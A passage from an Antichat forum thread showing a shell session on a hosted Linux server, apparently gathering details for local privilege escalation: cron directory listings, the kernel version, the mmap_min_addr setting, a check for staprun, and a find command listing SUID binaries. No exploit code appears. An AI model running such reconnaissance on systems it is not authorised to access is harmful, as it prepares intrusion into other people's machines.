47 6    * * 7    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *    root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$ ls -la cron.d
total 36
drwxr-xr-x   2 root root  4096 Jul 16  2014 .
drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
-rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
-rw-r--r--   1 root root   589 Apr 11  2013 mdadm
-rw-r--r--   1 root root   499 Aug  9  2013 php5
-rw-r-----   1 root root   116 Jul 16  2014 puppet_agent_restart
-rw-r--r--   1 root root   396 Dec 16  2011 sysstat
$ ls -la cron.hourly
total 20
drwxr-xr-x   2 root root  4096 Aug 22  2013 .
drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
-rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
$ ls -la cron.monthly
total 28
drwxr-xr-x   2 root root  4096 Aug 23  2013 .
drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
-rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
-rwxr-xr-x   1 root root  1281 May  6  2011 acct
-rwxr-xr-x   1 root root   534 Mar  8  2012 debsums
$ ls -la cron.weekly
total 32
drwxr-xr-x   2 root root  4096 Oct 10  2014 .
drwxr-xr-x 138 root root 12288 Oct  8 21:02 ..
-rw-r--r--   1 root root   102 Jun 20  2012 .placeholder
-rwxr-xr-x   1 root root   730 Dec 31  2011 apt-xapian-index
-rwxr-xr-x   1 root root   533 Mar  8  2012 debsums
-rwxr-xr-x   1 root root   907 Dec 28  2012 man-db
$ cat /proc/version
Linux version 3.10.82-timeweb (root@builder.timeweb.ru) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #1 SMP Fri Jul 3 10:11:34 MSK 2015
$ cat /proc/sys/vm/mmap_min_addr
65536
$ pwd
/etc
$ ls -la /usr/bin/staprun

$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
-rwsr-xr-x 1 root root 31304 Mar  2  2012 /bin/fusermount
-rwsr-xr-x 1 root root 35712 Nov  8  2011 /bin/ping
-rwsr-xr-x 1 root root 36832 Sep 13  2012 /bin/su
-rwsr-xr-x 1 root root 40256 Nov  8  2011 /bin/ping6
-rwsr-xr-x 1 root root 94792 Jun 18  2014 /bin/mount
-rwsr-xr-x 1 root root 69096 Jun 18  2014 /bin/umount
-rwsr-xr-x 1 root root 32232 May 17  2013 /sbin/mount.cifs
-rwsr-xr-x 1 root root 62400 Jul 29  2011 /usr/bin/mtr
-rwsr-xr-x 1 root root 37096 Sep 13  2012 /usr/bin/chsh
-rwsr-xr-x 2 root root 71280 Mar 12  2015 /usr/bin/sudoedit
-rwsr-xr-x 2 root root 71280 Mar 12  2015 /usr/bin/sudo
-rwsr-xr-x 1 root root 42824 Sep 13  2012 /usr/bin/passwd
-rwsr-xr-x 1 root root 41832 Sep 13  2012 /usr/bin/chfn
-rwsr-sr-x 1 daemon daemon 47928 Oct 25  2011 /usr/bin/at
-rwsr-xr-x 1 root root 35712 Nov  8  2009 /usr/bin/tcptraceroute.mt
-rwsr-xr-x 1 root root 32352 Sep 13  2012 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63848 Sep 13  2012 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 18912 Nov  8  2011 /usr/bin/traceroute6.iputils
-rwsr-xr-- 1 root dip 321552 Apr 21 20:33 /usr/sbin/pppd
-r-sr-x--- 1 root customers 940632 Dec 28  2012 /usr/sbin/exim4
-rwsr-x--- 1 _lldpd adm 55640 Nov 27  2011 /usr/sbin/lldpctl
-rwsr-sr-x 1 libuuid libuuid 18856 Jun 18  2014 /usr/sbin/uuidd
-rwsr-xr-x 1 root root 10592 Mar 26  2015 /usr/lib/pt_chown
-rwsr-xr-- 1 root messagebus 292944 Nov 25  2014 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10408 Dec 13  2011 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 240984 Aug 18 05:13 /usr/lib/openssh/ssh-keysign
$
 
Ответить с цитированием
Ответ
Страница 60 из 74 « Первая < 1050 56 57 58 59 60 61 62 63 64 70 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.